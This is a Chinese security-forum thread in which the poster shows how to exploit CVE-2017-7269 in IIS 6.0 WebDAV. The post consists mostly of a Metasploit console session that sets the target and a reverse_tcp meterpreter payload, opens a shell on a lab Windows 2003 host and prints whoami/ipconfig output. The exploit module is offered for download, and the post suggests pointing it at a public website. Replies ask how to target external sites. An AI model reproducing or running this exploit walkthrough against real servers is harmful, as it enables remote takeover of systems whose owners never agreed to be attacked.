用户
搜索
  • TA的每日心情

    2017-6-27 11:23
  • 签到天数: 4 天

    连续签到: 1 天

    [LV.2]偶尔看看

    版主

    成大事者 不拘小节

    Rank: 7Rank: 7Rank: 7

    54

    主题

    442

    帖子

    538

    魔法币
    收听
    0
    粉丝
    22
    注册时间
    2017-2-15

    楚积极活跃奖i春秋签约作者爱心勋章

    小爱_Joker 版主 成大事者 不拘小节 楚 积极活跃奖 i春秋签约作者 爱心勋章 楼主
    发表于 2017-4-4 20:38:02 7851636
    本帖最后由 小爱_Joker 于 2017-4-4 13:07 编辑

    前几天别人就爆出了这个漏洞 但是前几天我在外地 没时间发

    环境 Kali2016.2 IP 192.168.0.8    windows03主机 IP 192.168.0.24


    把exp 移到/usr/share/metasploit-framework/modules/exploits/windows/iis 目录
    如下图
    QQ截图20170404201058.png
    Metasploit配置
    提前已经设置好了
    [AppleScript] 纯文本查看 复制代码
    msf > search cve-2017-7269
    
    Matching Modules
    ================
    
       Name                               Disclosure Date  Rank  Description
       ----                               ---------------  ----  -----------
       exploit/windows/iis/cve-2017-7269  2017-03-31       good  CVE-2017-7269 Microsoft IIS WebDav ScStoragePathFromUrl Overflow
    
    
    msf > use exploit/windows/iis/cve-2017-7269
    msf exploit(cve-2017-7269) > show options
    
    Module options (exploit/windows/iis/cve-2017-7269):
    
       Name                Current Setting  Required  Description
       ----                ---------------  --------  -----------
       HttpHost            192.168.0.24     yes       http host for target
       PhysicalPathLength  19               yes       length of physical path for target(include backslash)
       RHOST               192.168.0.24     yes       The target address
       RPORT               80               yes       The target port (TCP)
    
    
    Payload options (windows/meterpreter/reverse_tcp):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
       LHOST     192.168.0.8      yes       The listen address
       LPORT     4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Microsoft Windows Server 2003 R2
    
    
    msf exploit(cve-2017-7269) > set RHOST 192.168.0.24
    RHOST => 192.168.0.24
    msf exploit(cve-2017-7269) > set HttpHost 192.168.0.24
    HttpHost => 192.168.0.24
    msf exploit(cve-2017-7269) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(cve-2017-7269) > set LHOST 192.168.0.8
    LHOST => 192.168.0.8
    msf exploit(cve-2017-7269) > exploit
     Started reverse TCP handler on 192.168.0.8:4444  Sending stage (957487 bytes) to 192.168.0.24[/size][/font][font=仿宋, 仿宋_GB2312][size=3] Meterpreter session 3 opened (192.168.0.8:4444 -> 192.168.0.24:1031) at 2017-04-04 20:28:28 +0800
    
    meterpreter > 

    [AppleScript] 纯文本查看 复制代码
    msf exploit(cve-2017-7269) > set RHOST 192.168.0.24   //设置对方IP
    RHOST => 192.168.0.24
    msf exploit(cve-2017-7269) > set HttpHost 192.168.0.24   //设置对方网站 我直接虚拟机搭建的
    HttpHost => 192.168.0.24
    msf exploit(cve-2017-7269) > set payload windows/meterpreter/reverse_tcp  //设置返回载荷 
    payload => windows/meterpreter/reverse_tcp
    msf exploit(cve-2017-7269) > set LHOST 192.168.0.8   //设置本机IP
    LHOST => 192.168.0.8
    msf exploit(cve-2017-7269) > exploit   //溢出

    好像也可以设置外网的 比如我要溢出 www.w3bsafe.cn 这个站
    那么设置httphost为 www.w3bsafe.cn  RHOST 设置网站IP
    QQ截图20170404203210.png
    查看权限以及查看IP
    QQ截图20170404203412.png
    [AppleScript] 纯文本查看 复制代码
    c:\windows\system32\inetsrv>whoami
    whoami
    nt authority\network service
    
    c:\windows\system32\inetsrv>ipconfig
    ipconfig
    
    Windows IP Configuration
    
    
    Ethernet adapter ��������:
    
       Connection-specific DNS Suffix  . : 
       IP Address. . . . . . . . . . . . : 192.168.0.24
       Subnet Mask . . . . . . . . . . . : 255.255.255.0
       Default Gateway . . . . . . . . . : 192.168.0.1
    
    c:\windows\system32\inetsrv>





    利用方式特别简单 只需要一个Metasploit的Exp 你学会了嘛?
    拿插件前记得评论下哦~ 评论奖励3魔法币  相当于免费送哦~ 100%中奖哦~
    cve-2017-7269-master.zip (3.01 KB, 下载次数: 327)

    评分

    参与人数 1魔法币 +1 收起 理由
    snsky + 1 感谢你的分享,i春秋论坛有你更精彩!.

    查看全部评分

    小贝贝LMN 发表于 2017-4-5 13:08
    能解释exp什么意思吗?还有metasploit执行攻击的时候返回no session creative 什么意思?
    ...

    exp是exploit的英文缩写。exp代码 ,就是可以直接利用这个漏洞的代码。
    no  session creative  就是没有会话,也就是说,比如你用metasploit要远程控制一台电脑,并且成功后,你和这电脑之间的数据通信就可以比作一个会话;  使用命令:sessions -l  可以查看会话;比如你要选择第一个会话就可以:sessions 1  就可以进入1会话。
    no pain no gain
    使用道具 举报 回复
    l春秋 发表于 2017-4-5 17:08
    exp是exploit的英文缩写。exp代码 ,就是可以直接利用这个漏洞的代码。
    no  session creative  就是没有会 ...

    插件就不需要了,感谢这种无私分享精神,赞!!!
    使用道具 举报 回复
    能问下   如果检测外网的网站   本地主机采用了VPN  该怎么设计载荷信息
    使用道具 举报 回复
    请问,怎么获取外网IP地址。我只知道对方的域名。通过ping命令或者反查到的IP地址都无法直接访问。
    使用道具 举报 回复

    http://www.zcgonvh.com/post/tips_for_cve_2017_7269.html
    使用道具 举报 回复
    能解释exp什么意思吗?还有metasploit执行攻击的时候返回no session creative 什么意思?
    使用道具 举报 回复
    发表于 2017-4-4 20:46:59

    回帖奖励 +3

           66666666666
    使用道具 举报 回复
    发表于 2017-4-4 20:59:27
    多谢分享
    使用道具 举报 回复

    回帖奖励 +3

    这exp在实际生产环境中能搞下几乎等于零。
    使用道具 举报 回复
    发表于 2017-4-4 21:51:39
    自己写exp吗   
    使用道具 举报 回复
    发表于 2017-4-4 22:19:46
    表哥团稳6666
    使用道具 举报 回复
    发表于 2017-4-5 02:03:11
    666666我转载咯=.=
    使用道具 举报 回复
    发表于 2017-4-5 08:31:02

    666666我转载咯=.=
    使用道具 举报 回复
    发表于 2017-4-5 09:36:33
    继续学习了
    使用道具 举报 回复
    发表于 2017-4-5 10:22:08
    不觉明历
    没看到的世界,不代表不存在。
    使用道具 举报 回复
    发表于 2017-4-5 10:22:48
    666666666666
    使用道具 举报 回复
    谢谢分享作者的分享!!!
    使用道具 举报 回复
    发表于 2017-4-5 10:41:32
    谢谢分享作者的分享!!!
    使用道具 举报 回复
    学到了!!!!!!!!!!!!
    使用道具 举报 回复
    发表于 2017-4-5 10:46:18
    赵日天 发表于 2017-4-4 21:15
    这exp在实际生产环境中能搞下几乎等于零。

    为什么???
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册